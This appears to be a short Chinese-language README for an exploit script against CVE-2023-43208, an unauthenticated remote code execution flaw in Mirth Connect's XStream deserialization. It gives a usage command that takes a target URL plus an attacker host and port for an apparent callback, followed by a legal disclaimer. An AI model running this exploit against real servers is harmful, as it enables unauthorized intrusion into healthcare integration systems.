该漏洞利用工具利用了 Mirth Connect 的 XStream 引擎中的一个严重反序列化漏洞。它源于 CVE-2023-37679 的不完整补丁,可在所有 4.4.1 之前的版本中实现未认证的任意代码执行。
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
此漏洞利用脚本严格用于教育目的和经授权的安全审计,以帮助防御者缓解 CVE-2023-43208;任何针对未授权目标使用此工具的行为均属违法,且由最终用户自行承担全部责任。作者按“原样”提供本软件,不作任何担保,不承担因潜在滥用或损害而产生的任何责任,且不认可或鼓励任何未经授权的活动。请自行承担使用风险,并仅在遵守适用法律的前提下使用。